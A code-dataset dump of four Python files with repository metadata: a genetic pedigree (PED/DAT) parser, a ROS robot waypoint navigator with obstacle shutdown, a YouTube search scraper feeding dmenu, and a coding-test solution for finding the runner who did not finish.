blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bdc87f3315390e5fc8eb03321ccd018f13499ff4 | a00c8a827cac629e2d6319609090ae74663fe701 | /biu/formats/pedUtils.py | 044d1aac7316d5fe019328c36168e60105012ea3 | [] | no_license | thiesgehrmann/BIU | 78a7278665733eaa5f283296ee8a3cb61c9c7cb6 | c6031b24541ae8b1ee1870c8249f8c4929ff12d1 | refs/heads/master | 2021-10-07T17:11:19.214872 | 2021-09-27T11:44:05 | 2021-09-27T11:44:05 | 145,121,659 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 20,889 | py | from .. import utils
import errno
import re
import os
import csv
###############################################################################
# TO MATCH THE MERLIN documentation
class Individual(object):
    """One pedigree member (a MERLIN-style PED row): IDs, parent links,
    gender, and a PhenoGenotype holding the feature columns."""

    __slots__ = ['__famID', '__indivID', '__fatherID', '__motherID',
                 '__gender', '__features']

    def __init__(self, famID, indivID, fatherID, motherID, gender, features):
        # IDs are normalized to strings because they are used as dict keys.
        self.__famID = str(famID)
        self.__indivID = str(indivID)
        self.__fatherID = fatherID
        self.__motherID = motherID
        self.__gender = gender
        self.__features = features

    @staticmethod
    def fromRow(row, datFormat):
        """Build an Individual from a split PED row, using datFormat for the
        feature columns. '0' parents become None; gender '1'/'m' -> 'm'."""
        cells = [cell.strip() for cell in row]
        father = None if cells[2] == '0' else cells[2]
        mother = None if cells[3] == '0' else cells[3]
        gender = 'm' if cells[4] in ('1', 'm') else 'f'
        return Individual(str(cells[0]), str(cells[1]), father, mother,
                          gender, PhenoGenotype(cells[5:], datFormat))

    def toRow(self):
        """Serialize back to a PED row; absent parents render as '0'."""
        father = '0' if self.__fatherID is None else self.__fatherID
        mother = '0' if self.__motherID is None else self.__motherID
        return [self.__famID, self.__indivID, father, mother,
                self.__gender] + self.__features.raw

    def __str__(self):
        pieces = ["Pedigree Individual\n",
                  " Family ID: %s\n" % self.__famID,
                  " Individual ID: %s\n" % self.__indivID,
                  " Mother/Father ID: %s/%s\n" % (self.__motherID,
                                                  self.__fatherID),
                  " Gender: %s\n" % self.__gender,
                  " Affection status:\n"]
        for affection in self.__features.affections:
            pieces.append(" %s : %s" % (
                self.__features.getFeatureName(affection),
                self.__features[affection]))
        return "".join(pieces)

    @property
    def famID(self):
        """Family identifier (string)."""
        return self.__famID

    @property
    def ID(self):
        """Individual identifier (string)."""
        return self.__indivID

    def setID(self, newID):
        self.__indivID = newID

    @property
    def fatherID(self):
        """Father's individual ID, or None if unknown."""
        return self.__fatherID

    def setFather(self, newID):
        self.__fatherID = newID

    @property
    def motherID(self):
        """Mother's individual ID, or None if unknown."""
        return self.__motherID

    def setMother(self, newID):
        self.__motherID = newID

    @property
    def gender(self):
        return self.__gender

    @property
    def features(self):
        """The PhenoGenotype feature container."""
        return self.__features

    @property
    def isFounder(self):
        """True when neither parent is recorded."""
        return self.__fatherID is None and self.__motherID is None

    def getFeature(self, feature):
        return self.__features[feature]

    def setFeature(self, feature, value):
        self.__features[feature] = value

    def copy(self, datFormat):
        """Copy this individual, re-parsing the features against datFormat."""
        return Individual(self.__famID, self.__indivID, self.__fatherID,
                          self.__motherID, self.__gender,
                          self.__features.copy(datFormat))
###############################################################################
class PhenoGenotype(object):
    """
    Per-individual phenotype/genotype values of a PED row, stored as a
    {fieldName: value} dict keyed by the DAT format's field names.

    During construction the raw row is normalized against the DAT format:
    marker ('m') fields supplied as two separate allele columns are merged
    into a single 'a/b' value, and DAT fields with no corresponding column
    are filled with that field's unknown/empty value.
    """

    __slots__ = ['__row', '__datFormat']

    def __init__(self, row, datFormat):
        """
        row: list of raw string values from the PED file (may be short/empty).
        datFormat: DAT-like object describing field names and types.
        """
        self.__row = row
        self.__datFormat = datFormat
        nFeaturesRow = len(row)
        nFeaturesDat = len(datFormat)
        # Start every field at its unknown/empty value, then overwrite from
        # the row as far as it goes.
        fixedRow = {datFormat.getFeatureName(i): datFormat.emptyValueOfField(i)
                    for i in range(nFeaturesDat)}
        rowIndex = 0
        datIndex = 0
        while datIndex < nFeaturesDat:
            if rowIndex >= nFeaturesRow:
                break
            featureName = datFormat.getFeatureName(datIndex)
            featureType = self.__datFormat.getFeatureType(datIndex)
            if (featureType == 'm') and ('/' not in row[rowIndex]):
                # Marker given as two allele columns; merge them into 'a/b'.
                # NOTE(review): assumes the second allele column is present;
                # a truncated row would raise IndexError here — confirm
                # upstream input is always well formed.
                fixedRow[featureName] = '%s/%s' % (row[rowIndex], row[rowIndex+1])
                rowIndex += 2
                datIndex += 1
            else:
                fixedRow[featureName] = row[rowIndex]
                rowIndex += 1
                datIndex += 1
        self.__row = fixedRow
        if rowIndex < nFeaturesRow:
            utils.error("More provided features than in DAT file. IGNORED!")
        elif datIndex < nFeaturesDat:
            utils.error("More DAT features than provided. Filling with unknown values. Verify your PED/DAT file.")

    @property
    def raw(self):
        """The values as a list of strings, in DAT field order."""
        row = [str(self.__row[featureName])
               for (featureType, featureName) in self.__datFormat]
        return row

    def __getitem__(self, identifier):
        """Look a value up by field index (int) or field name (str)."""
        if isinstance(identifier, int):
            fieldName = self.__datFormat.getFeatureName(identifier)
            if fieldName is None:
                return None
            return self.__row[fieldName]
        elif isinstance(identifier, str):
            return self.__row[identifier]
        return None

    def __len__(self):
        return len(self.__row) if self.__row is not None else 0

    def __setitem__(self, key, value):
        """Set a value by field index (int) or field name (str)."""
        if isinstance(key, int):
            fieldName = self.__datFormat.getFeatureName(key)
            if fieldName is None:
                return None
            self.__row[fieldName] = value
        elif isinstance(key, str):
            self.__row[key] = value
        return None

    def getFeatureName(self, identifier):
        """Return the field name for an index or name, via the DAT format."""
        return self.__datFormat[identifier][2]

    @property
    def affections(self):
        """Indices of affection ('a') fields, delegated to the DAT format."""
        return self.__datFormat.affections

    @property
    def covariates(self):
        """Indices of covariate ('c') fields."""
        return self.__datFormat.covariates

    @property
    def traits(self):
        """Indices of trait ('t') fields."""
        return self.__datFormat.traits

    @property
    def markers(self):
        """Indices of marker ('m') fields."""
        return self.__datFormat.markers

    def emptyValueOfField(self, fieldID):
        """Return the unknown/empty value for the given field (index or name)."""
        # BUGFIX: the original forwarded a stray `self` argument to the DAT
        # method (datFormat.emptyValueOfField(self, fieldID)), which raised
        # TypeError on every call.
        return self.__datFormat.emptyValueOfField(fieldID)

    def __str__(self):
        dstr = "Genotype and Phenotype Object\n"
        for fieldName in self.__row:
            dstr += " %s: %s\n" % (fieldName, self.__row[fieldName])
        return dstr

    def copy(self, datFormat):
        """Copy by re-parsing the raw values against (possibly new) datFormat."""
        return PhenoGenotype(self.raw, datFormat)
###############################################################################
class Family(object):
    """A named pedigree family: a dict of Individuals keyed by member ID."""

    # BUGFIX: the original declared a plain `slots` attribute, which has no
    # effect; a real __slots__ keeps instances lightweight.
    __slots__ = ['__famID', '__members', '__datFormat']

    def __init__(self, famID, datFormat, members=None):
        """
        famID: family identifier (stored as str).
        datFormat: DAT describing the feature columns (used by newMember).
        members: a {ID: Individual} dict, an iterable of Individuals, or
            None for an empty family. (BUGFIX: the original used a mutable
            default list, shared across calls.)
        """
        self.__famID = str(famID)
        self.__datFormat = datFormat
        if members is None:
            self.__members = {}
        elif isinstance(members, dict):
            self.__members = members
        else:
            self.__members = {member.ID: member for member in members}

    def __str__(self):
        dstr = ""
        dstr += "Pedigree Family\n"
        dstr += " Members: %d\n" % len(self.__members)
        dstr += " Founders: %d\n" % self.nFounders
        return dstr

    def __contains__(self, memberID):
        return str(memberID) in self.__members

    @property
    def famID(self):
        return self.__famID

    def add(self, individual):
        """Add (or overwrite, with a debug message) an Individual."""
        if isinstance(individual, Individual):
            if individual.ID in self.__members:
                utils.dbm("Overwriting individual '%s' in family '%s'" % (individual.ID, self.famID))
            self.__members[individual.ID] = individual
        else:
            utils.error("Cannot add this object to family")

    def newMember(self, indivID, fatherID, motherID, gender):
        """Create, add, and return a new member with empty features.

        fatherID/motherID may be Individual objects (must belong to this
        family) or bare IDs; unknown bare IDs only produce a warning.
        Returns None if a parent Individual is from another family.
        """
        if isinstance(fatherID, Individual):
            if fatherID.famID != self.famID:
                # BUGFIX: the original referenced an undefined `father`
                # variable here, raising NameError instead of reporting.
                utils.error("Family ID of father (%s) is not this family: '%s'" % (fatherID.famID, self.famID))
                return None
            fatherID = fatherID.ID
        elif (fatherID is not None) and (fatherID not in self.__members):
            utils.warning("FatherID '%s' is not present in this family." % fatherID)
        if isinstance(motherID, Individual):
            if motherID.famID != self.famID:
                # BUGFIX: same undefined-variable problem with `mother`.
                utils.error("Family ID of mother (%s) is not this family: '%s'" % (motherID.famID, self.famID))
                return None
            motherID = motherID.ID
        elif (motherID is not None) and (motherID not in self.__members):
            utils.warning("MotherID '%s' is not present in this family." % motherID)
        features = PhenoGenotype([], self.__datFormat)
        newPerson = Individual(self.famID, indivID, fatherID, motherID, gender, features)
        self.add(newPerson)
        return newPerson

    def delMember(self, memberID):
        """Remove a member and clear any parent links pointing at them."""
        memberID = str(memberID)
        if memberID in self.__members:
            del self.__members[memberID]
            for member in self.__members:
                if self.__members[member].motherID == memberID:
                    self.__members[member].setMother(None)
                elif self.__members[member].fatherID == memberID:
                    self.__members[member].setFather(None)

    def __len__(self):
        return len(self.__members)

    def __iadd__(self, individual):
        """Support `family += individual`."""
        self.add(individual)
        # BUGFIX: __iadd__ must return self; the original returned None,
        # which rebound the caller's variable to None after `+=`.
        return self

    @property
    def nFounders(self):
        """Number of members with no recorded parents."""
        return len([m for m in self.__members.values() if m.isFounder])

    @property
    def members(self):
        """The underlying {ID: Individual} dict."""
        return self.__members

    def __iter__(self):
        return self.__members.__iter__()

    def __getitem__(self, key):
        return self.members[key]

    def changeMemberID(self, currentID, newID):
        """Rename a member, updating all parent links that referenced them."""
        if currentID not in self.__members:
            utils.warning("Cannot change name of '%s', no such member." % currentID)
            return
        self.__members[newID] = self.__members[currentID]
        self.__members[newID].setID(newID)
        del self.__members[currentID]
        for memberID in self.__members:
            if memberID != newID:
                if self.__members[memberID].motherID == currentID:
                    self.__members[memberID].setMother(newID)
                elif self.__members[memberID].fatherID == currentID:
                    self.__members[memberID].setFather(newID)

    def copy(self, datFormat):
        """Deep copy: every member is copied against the given datFormat."""
        members = {memberID: self.__members[memberID].copy(datFormat)
                   for memberID in self.__members}
        return Family(self.famID, datFormat, members)
###############################################################################
class DAT(object):
    """
    A MERLIN-style DAT format: an ordered list of (fieldType, fieldName)
    pairs describing the feature columns of a PED file, plus a parallel
    boolean mask used to hide fields on output (masked fields are written
    with type 'S').

    Field types: 'a' affection, 'c' covariate, 't' trait, 'm' marker,
    's' skipped/string.
    """

    __slots__ = ['__fields', '__mask', '__types', '__names', '__fileName']

    def __init__(self, data, delimiter=' ', quotechar='#', mask=None):
        """
        data: either a DAT filename to parse, or a pre-built list of
            (fieldType, fieldName) tuples.
        mask: optional boolean list; ignored unless it matches the field
            count exactly.
        """
        self.__fields = None
        self.__types = None
        self.__names = None
        self.__fileName = None
        self.__mask = None
        fields = []
        if isinstance(data, str):
            # Parse the file: each row is "<type> <name>"; 'E' ends the data.
            with open(data, 'r') as ifd:
                reader = csv.reader(ifd, delimiter=delimiter, quotechar=quotechar)
                for row in reader:
                    row = [col for col in row if col != ""]
                    if len(row) != 2:
                        continue
                    fieldType = row[0].lower()
                    fieldValue = row[1]
                    if fieldType == 'e':
                        break
                    if fieldType not in ['a', 'c', 't', 'm', 's']:
                        utils.warning("Unknown fieldType '%s'" % fieldType)
                        fieldType = 's'
                    fields.append((fieldType, fieldValue))
            self.__fields = fields
            self.__fileName = data
        else:
            self.__fields = data
        if (mask is None) or len(mask) != len(self.__fields):
            self.__mask = [False for field in self.__fields]
        else:
            self.__mask = mask
        self.__indexFields()

    def __indexFields(self):
        """Rebuild the type->indices and name->index lookup tables."""
        self.__types = {}
        self.__names = {}
        for i, (fieldType, fieldName) in enumerate(self.__fields):
            fieldType = fieldType.lower()
            if fieldType not in self.__types:
                self.__types[fieldType] = []
            self.__types[fieldType].append(i)
            self.__names[fieldName] = i

    def add(self, fieldType, fieldName):
        """Append a new field; reports an error on duplicate names or
        invalid types (and leaves the format unchanged)."""
        if fieldName in self.__names:
            utils.error("Field '%s' already exists." % fieldName)
            return
        fieldType = fieldType.lower()
        # BUGFIX: the original used `fieldType not in 'actms'` — a substring
        # test that wrongly accepted '' and multi-character runs like 'ac'.
        if fieldType not in ['a', 'c', 't', 'm', 's']:
            utils.error("'%s' not a valid field type." % fieldType)
        else:
            self.__fields.append((fieldType, fieldName))
            self.__indexFields()
            self.__mask.append(False)

    @property
    def affections(self):
        """Indices of affection ('a') fields."""
        return self.__types['a'] if 'a' in self.__types else []

    def emptyFeatures(self):
        """Return the unknown/empty value for every field, in order."""
        # BUGFIX: the original passed the field *type* to emptyValueOfField,
        # which expects an index or name, causing a KeyError.
        return [self.emptyValueOfField(i) for i in range(len(self.__fields))]

    @property
    def covariates(self):
        """Indices of covariate ('c') fields."""
        return self.__types['c'] if 'c' in self.__types else []

    @property
    def traits(self):
        """Indices of trait ('t') fields."""
        return self.__types['t'] if 't' in self.__types else []

    @property
    def markers(self):
        """Indices of marker ('m') fields."""
        return self.__types['m'] if 'm' in self.__types else []

    def __getitem__(self, identifier):
        """Return (index, type, name) for an index (int) or name (str)."""
        if isinstance(identifier, int):
            fieldType, fieldName = self.__fields[identifier]
            return (identifier, fieldType, fieldName)
        elif isinstance(identifier, str):
            fieldID = self.__names[identifier]
            fieldType, fieldName = self.__fields[fieldID]
            return (fieldID, fieldType, fieldName)
        else:
            return None

    def __len__(self):
        return len(self.__fields)

    def __iter__(self):
        """Iterate over (fieldType, fieldName) pairs."""
        return self.__fields.__iter__()

    def keys(self):
        """The name->index mapping."""
        return self.__names

    def __contains__(self, field):
        return field in self.__names

    def getFeatureType(self, field):
        fieldID, fieldType, fieldName = self[field]
        return fieldType

    def setFeatureType(self, field, newFieldType):
        fieldID, fieldType, fieldName = self[field]
        newFieldType = newFieldType.lower()
        if newFieldType in ['a', 'c', 't', 'm', 's']:
            self.__fields[fieldID] = (newFieldType, fieldName)
        else:
            utils.error("Invalid feature type '%s'." % newFieldType)

    def getFeatureName(self, field):
        fieldID, fieldType, fieldName = self[field]
        return fieldName

    def getFeatureID(self, fieldName):
        fieldID, fieldType, fieldName = self[fieldName]
        return fieldID

    def maskFeature(self, featureName):
        """Hide a field: it will be written out with type 'S'."""
        featureID, featureType, featureName = self[featureName]
        self.__mask[featureID] = True

    def unmaskFeature(self, featureName, newFeatureType=None):
        """Unhide a field, optionally changing its type at the same time."""
        featureID, featureType, featureName = self[featureName]
        self.__mask[featureID] = False
        if newFeatureType is not None:
            self.setFeatureType(featureName, newFeatureType)
            self.__mask[featureID] = False

    def detectType(self, value):
        """Guess a field type from one example value (heuristic)."""
        if ('/' in value) or (' ' in value):
            return 'm'
        elif value.upper() == 'X':
            return 't'
        elif value in ['0', '1', '2']:
            return 'a'
        else:
            return 's'

    def emptyValueOfField(self, fieldID):
        """The unknown/empty value for one field: '0/0' for markers,
        'X' otherwise."""
        fieldID, fieldType, fieldName = self[fieldID]
        if fieldType == 'a':
            return 'X'
        elif fieldType == 'c':
            return 'X'
        elif fieldType == 't':
            return 'X'
        elif fieldType == 'm':
            return '0/0'
        elif fieldType == 's':
            return 'X'
        else:
            return '0'

    def write(self, fileName):
        """Write the format to a DAT file; masked fields become type 'S'."""
        with open(fileName, "w") as ofd:
            for i, (fieldType, fieldName) in enumerate(self.__fields):
                fieldType = 'S' if self.__mask[i] else fieldType.upper()
                ofd.write("%s %s\n" % (fieldType, fieldName))
            ofd.write("E\tEND-OF-DATA\n")
            self.__fileName = fileName

    def copy(self):
        """Independent copy of fields and mask."""
        # BUGFIX: copy the mask list too; the original aliased it, so
        # masking the copy also masked the original.
        return DAT([(fieldType, fieldName)
                    for (fieldType, fieldName) in self.__fields],
                   mask=list(self.__mask))
###############################################################################
class PED(object):
    """
    A MERLIN-style PED file: Family objects keyed by family ID, together
    with the DAT format that describes the feature columns.
    """

    __slots__ = ['families', '__fileName', '__datFile', '__datFormat']

    # Conventional MERLIN affection-status codes.
    standardValues = {
        'affected_true': 2,
        'affected_false': 1,
        'affected_unknown': 0,
    }

    def __init__(self, data, datFile=None, datFormat=None, **kwargs):
        """
        data: a PED filename, a {famID: Family} dict, a single Family, or
            an iterable of Family objects.
        datFile: path to the matching DAT file (parsed if datFormat absent).
        datFormat: a pre-built DAT object (takes precedence over datFile).
        """
        self.families = {}
        self.__fileName = None
        self.__datFile = datFile
        self.__datFormat = None
        if datFormat is not None:
            self.__datFormat = datFormat
        elif isinstance(datFile, str):
            self.__datFormat = DAT(datFile)
            self.__datFile = datFile
        else:
            utils.warning("You must provide a DAT file to match. I will try to guess them!")
            self.__datFormat = DAT([])
            self.__datFile = None
        if isinstance(data, str):
            self.families = PED.fromFile(data, self.__datFormat)
            self.__fileName = data
        elif isinstance(data, dict):
            self.families = data
        elif isinstance(data, Family):
            self.families = {data.famID: data}
        else:
            # BUGFIX: the original built a *set* of family IDs here instead
            # of a {famID: Family} dict, breaking every later lookup.
            self.families = {f.famID: f for f in data}

    def __contains__(self, famID):
        return str(famID) in self.families

    def __getitem__(self, famID):
        """Return the Family with this ID, or None if absent."""
        famID = str(famID)
        if famID in self.families:
            return self.families[famID]
        return None

    def __delitem__(self, famID):
        """Remove a family if present (silently ignores unknown IDs)."""
        famID = str(famID)
        if famID in self.families:
            del self.families[famID]

    def subset(self, famIDs):
        """Return a new PED containing deep copies of the named families
        (unknown IDs are silently skipped)."""
        datFormatCopy = self.__datFormat.copy()
        if isinstance(famIDs, str) or isinstance(famIDs, int):
            famIDs = [famIDs]
        famIDs = [str(famID) for famID in famIDs]
        retFams = {famID: self.families[famID].copy(datFormatCopy)
                   for famID in famIDs if (famID in self.families)}
        return PED(data=retFams, datFormat=datFormatCopy)

    def emptyFeatures(self):
        """Return the unknown/empty value for every feature, in order."""
        # BUGFIX: the original dropped the return value.
        return self.__datFormat.emptyFeatures()

    def maskFeature(self, feature):
        """Hide a feature on output (written as type 'S' in the DAT)."""
        self.__datFormat.maskFeature(feature)

    def unmaskFeature(self, feature, newFeatureType=None):
        """Unhide a feature, optionally changing its type."""
        self.__datFormat.unmaskFeature(feature, newFeatureType)

    def addFeature(self, featureType, featureName, defaultValue=None):
        """Add a feature to the DAT format and give every member a value
        (defaultValue, or the type's unknown/empty value)."""
        self.__datFormat.add(featureType, featureName)
        emptyValue = self.__datFormat.emptyValueOfField(featureName) if defaultValue is None else defaultValue
        for famID in self:
            for memberID in self[famID]:
                self[famID][memberID].setFeature(featureName, emptyValue)

    def features(self):
        """The feature name->index mapping."""
        return self.__datFormat.keys()

    def getFeature(self, featureName):
        """Return {(famID, memberID): value} for one feature across the
        whole pedigree ({} with an error message if the feature is unknown)."""
        values = {}
        if featureName not in self.__datFormat:
            utils.error("Feature '%s' doesn't exist." % featureName)
            return values
        for famID in self.families:
            family = self[famID]
            for memberID in family:
                values[(famID, memberID)] = family[memberID].getFeature(featureName)
        return values

    def __iter__(self):
        return self.families.__iter__()

    def newFamily(self, famID):
        """Create (or overwrite, with a warning) an empty family."""
        famID = str(famID)
        if famID in self.families:
            utils.warning("Overwriting family '%s'." % famID)
        self.families[famID] = Family(famID, self.__datFormat, [])
        return self.families[famID]

    @staticmethod
    def fromFile(fileName, datFormat, delimiter='\t', quotechar='#', nrows=None, **kwargs):
        """Parse a PED file into a {famID: Family} dict.

        Rows are split on any whitespace; parsing stops after nrows rows
        (if given) or at the first row with fewer than 5 columns.
        """
        irow = 0
        families = {}
        with open(fileName, 'r') as ifd:
            rePattern = re.compile(r"[\s]+")
            for line in ifd:
                row = [col for col in rePattern.split(line) if col != ""]
                irow = irow + 1
                if (nrows is not None) and (irow > nrows):
                    utils.dbm("I will; break here")
                    break
                if len(row) < 5:
                    break
                indiv = Individual.fromRow(row, datFormat)
                if indiv.famID not in families:
                    families[indiv.famID] = Family(indiv.famID, datFormat, [indiv])
                else:
                    families[indiv.famID].add(indiv)
        return families

    @property
    def nFeatures(self):
        return len(self.__datFormat)

    def __str__(self):
        dstr = "PED object\n"
        dstr += " Where: %s\n" % (self.__fileName if self.__fileName is not None else hex(id(self)))
        dstr += " DAT file: %s\n" % (self.__datFile if self.__datFile is not None else hex(id(self.__datFormat)))
        dstr += " Families: %d\n" % len(self.families)
        dstr += " Founders: %d\n" % sum([self.families[famID].nFounders for famID in self.families])
        dstr += " Total: %d\n" % (sum([len(self.families[famID]) for famID in self.families]))
        dstr += " Features: %d\n" % (self.nFeatures)
        dstr += " Affections: %d\n" % len(self.__datFormat.affections)
        dstr += " Covariates: %d\n" % len(self.__datFormat.covariates)
        dstr += " Traits: %d\n" % len(self.__datFormat.traits)
        dstr += " Markers: %d\n" % len(self.__datFormat.markers)
        return dstr

    def write(self, fileName, datFileName=None):
        """Write the PED file and its DAT file (datFileName defaults to the
        PED name with a .dat extension)."""
        if datFileName is None:
            if fileName[-3:].lower() == 'ped':
                datFileName = fileName[:-3] + 'dat'
            else:
                datFileName = fileName + '.dat'
        with open(fileName, 'w') as ofd:
            for famID in self.families:
                for memberID in self.families[famID].members:
                    member = self.families[famID][memberID]
                    row = member.toRow()
                    ofd.write('\t'.join(row) + '\n')
            self.__fileName = fileName
        self.__datFormat.write(datFileName)
| [
"tgehrmann@shark.researchlumc.nl"
] | tgehrmann@shark.researchlumc.nl |
584b62ac1c40023ce693c76df2c3138f396308c1 | aa65d15af356165db479f5357afe78d939a85eb4 | /cs3027/practicals/catkin_ws/src/practical_03_07/a_to_many.py | e0563f319c233cf33c38ac2a15ca2311e2a2ac87 | [] | no_license | KNejad/university_notes | d9de478437452e2f07467798bcb774f049a2cf01 | ee7df9aa39cd9a383558b8205ebad02bbf23a95c | refs/heads/master | 2021-06-06T00:50:37.527538 | 2020-01-19T10:40:32 | 2020-01-19T10:40:32 | 71,895,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,117 | py | #!/usr/bin/env python
import rospy
import tf
import math
from geometry_msgs.msg import Point
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Header
class AToMany:
    """
    Drives a robot through a list of goal points given in the /odom frame,
    shutting the node down if the laser scanner ever reports an obstacle
    within 0.5 m of the robot.
    """

    def __init__(self):
        # BUGFIX: dangerous_obstacles was a class attribute, so the list was
        # shared between all instances and persisted across node restarts in
        # the same process. It is now per-instance, and is created before
        # the subscribers so a fast first callback cannot race it.
        self.dangerous_obstacles = []
        rospy.init_node("a_to_many", anonymous=True)
        rospy.Subscriber("/base_pose_ground_truth", Odometry, self.odometry_callback)
        rospy.Subscriber("/base_scan", LaserScan, self.laser_scanner_callback)
        self.rate = rospy.Rate(5)
        self.velocity_publisher = rospy.Publisher('/cmd_vel', Twist, queue_size=10)
        self.tf_listener = tf.TransformListener()

    def odometry_callback(self, odometry_data):
        """Cache the latest ground-truth pose."""
        self.pose = odometry_data.pose.pose

    def laser_scanner_callback(self, laser_scan):
        """Record any valid scan return closer than 0.5 m as a dangerous
        obstacle, converted into the /odom frame."""
        current_angle = laser_scan.angle_min
        for laser_range in laser_scan.ranges:
            if laser_range < laser_scan.range_max:
                if not hasattr(self, "pose"):
                    # No pose received yet; ignore this scan entirely.
                    return False
                obstacle = self.convert_laser_range_to_point(laser_range, current_angle)
                if self.euclidean_distance(obstacle.point) < 0.5:
                    # NOTE(review): convert_to_frame can return False on TF
                    # errors, which would later break check_if_safe's min();
                    # confirm TF is always available here.
                    self.dangerous_obstacles.append(self.convert_to_frame("/odom", obstacle))
            current_angle += laser_scan.angle_increment

    def convert_laser_range_to_point(self, laser_range, current_angle):
        """Turn a (range, bearing) laser return into a PointStamped in
        the /base_link frame."""
        x = laser_range * math.cos(current_angle)
        y = laser_range * math.sin(current_angle)
        return PointStamped(header=Header(stamp=rospy.Time.now(), frame_id="/base_link"),
                            point=Point(x, y, 0))

    def euclidean_distance(self, a, b=Point(0, 0, 0)):
        """2D Euclidean distance between two Points; b defaults to the
        origin (the shared default instance is never mutated)."""
        return math.sqrt(pow(a.x - b.x, 2) + pow(a.y - b.y, 2))

    def angular_velocity(self, local_frame_goal):
        """Bearing (radians) from the robot to a goal in /base_link."""
        return math.atan2(local_frame_goal.y, local_frame_goal.x)

    def convert_to_frame(self, frame, stamped_point):
        """Transform a PointStamped into `frame`; returns False on TF errors."""
        try:
            self.tf_listener.waitForTransform(frame, stamped_point.header.frame_id, rospy.Time(), rospy.Duration(4))
            return self.tf_listener.transformPoint(frame, stamped_point)
        except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
            return False

    def check_if_safe(self):
        """If any dangerous obstacle has been seen, log it, shut the node
        down, and return False; otherwise return True."""
        if len(self.dangerous_obstacles) > 0:
            closest_obstacle = min(self.dangerous_obstacles, key=lambda x: self.euclidean_distance(x.point))
            error_message = f"Obstacle at: {closest_obstacle.point.x}, {closest_obstacle.point.y}"
            rospy.logerr(error_message)
            rospy.signal_shutdown(error_message)
            return False
        else:
            return True

    def go_to(self, destination):
        """Drive toward `destination` (PointStamped in /odom) until within
        5 cm, using a simple proportional controller."""
        # BUGFIX: convert_to_frame returns False on TF errors, but the
        # original dereferenced .point on the first result unconditionally.
        converted = self.convert_to_frame("/base_link", destination)
        while not converted:
            converted = self.convert_to_frame("/base_link", destination)
        local_frame_goal = converted.point
        while self.euclidean_distance(local_frame_goal) > 0.05:
            self.check_if_safe()
            converted = self.convert_to_frame("/base_link", destination)
            if not converted:
                # TF hiccup: keep steering toward the last known goal.
                continue
            local_frame_goal = converted.point
            vel_msg = Twist()
            # Speed scales with distance, turn rate with bearing error.
            vel_msg.linear.x = self.euclidean_distance(local_frame_goal)
            vel_msg.angular.z = self.angular_velocity(local_frame_goal)
            self.velocity_publisher.publish(vel_msg)
            self.rate.sleep()

    def go_to_many(self, destinations):
        """Visit every destination, ordered nearest-first (computed once,
        up front, from the starting position)."""
        destinations.sort(key=lambda x: self.euclidean_distance(self.convert_to_frame("/base_link", x).point))
        for destination in destinations:
            self.go_to(destination)
            rospy.loginfo(f"Made it to {destination.point.x}, {destination.point.y}")
if __name__ == "__main__":
    try:
        robot = AToMany()
        # Goal coordinates in the /odom frame.
        waypoints = []
        for x, y in [(14.49, 21.47), (20.33, 36.43), (20.95, 25.91), (27.15, 29.86)]:
            header = Header(stamp=rospy.Time(), frame_id="/odom")
            waypoints.append(PointStamped(header=header, point=Point(x, y, 0)))
        robot.go_to_many(waypoints)
    except rospy.ROSInterruptException:
        pass
| [
"keeyan@keeyan.xyz"
] | keeyan@keeyan.xyz |
c78f4d355386932cfd24d664e04f52fa4f14df1b | 017c54ec04bd23d04a1a4e3861c6b6ff00dff540 | /ytsearch.py | c9bb1461254a76c4e65244f42148752edff18006 | [] | no_license | Trisert/PythonScripts | 225332e652c372e23ee6040ea4bcf31348fe40ed | 81f07d43e726fa0407f15d4ce87a0de02213911d | refs/heads/main | 2023-07-07T22:26:18.462456 | 2021-08-19T08:17:01 | 2021-08-19T08:17:01 | 304,888,415 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | import dmenu
import urllib.request
import re
import urllib.parse

# Ask for a search term and percent-encode it for the query string.
# BUGFIX: the original replaced spaces with a bare '%', which is not valid
# URL encoding and corrupts multi-word searches; quote_plus() encodes the
# whole term correctly.
search_keyword = input("Inserisci cosa vuoi cercare: ")
query = urllib.parse.quote_plus(search_keyword)
html = urllib.request.urlopen(
    "https://www.youtube.com/results?search_query=" + query)
# Video IDs are the 11-character tokens following "watch?v=" in the page.
video_ids = re.findall(r"watch\?v=(\S{11})", html.read().decode())
# Present the IDs in a dmenu picker, 10 rows tall.
dmenu.show(video_ids, lines=10)
| [
"nicolade03@gmail.com"
] | nicolade03@gmail.com |
a165b00639df30ff67b8848e4ad2a89cdbba26cf | e87d89f1dc6dae209bf62a2bae6a4a1bb6684eab | /이지원/0831_ 42576.py | 2d9b0eb4b301a6c443c4cbee6fd6f0a33f6d364c | [] | no_license | youngseok30/codingtest | 291c497a5240c8d1071a7daed32bd59a31488fa5 | 9461bb473a1f8724a2f374e05fd79a6ea30a38da | refs/heads/master | 2023-03-19T04:36:04.233681 | 2020-10-19T02:59:09 | 2020-10-19T02:59:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | # https://programmers.co.kr/learn/courses/30/lessons/42576
# 완주하지 못한 선수
def solution(participant, completion):
answer = ''
dict = {}
for p in participant:
dict[p] = dict.get(p, 0) + 1
for c in completion:
dict[c] -= 1
for key, value in dict.items():
if value == 1:
answer = key
break
return answer | [
"jiwon.swdev@gmail.com"
] | jiwon.swdev@gmail.com |
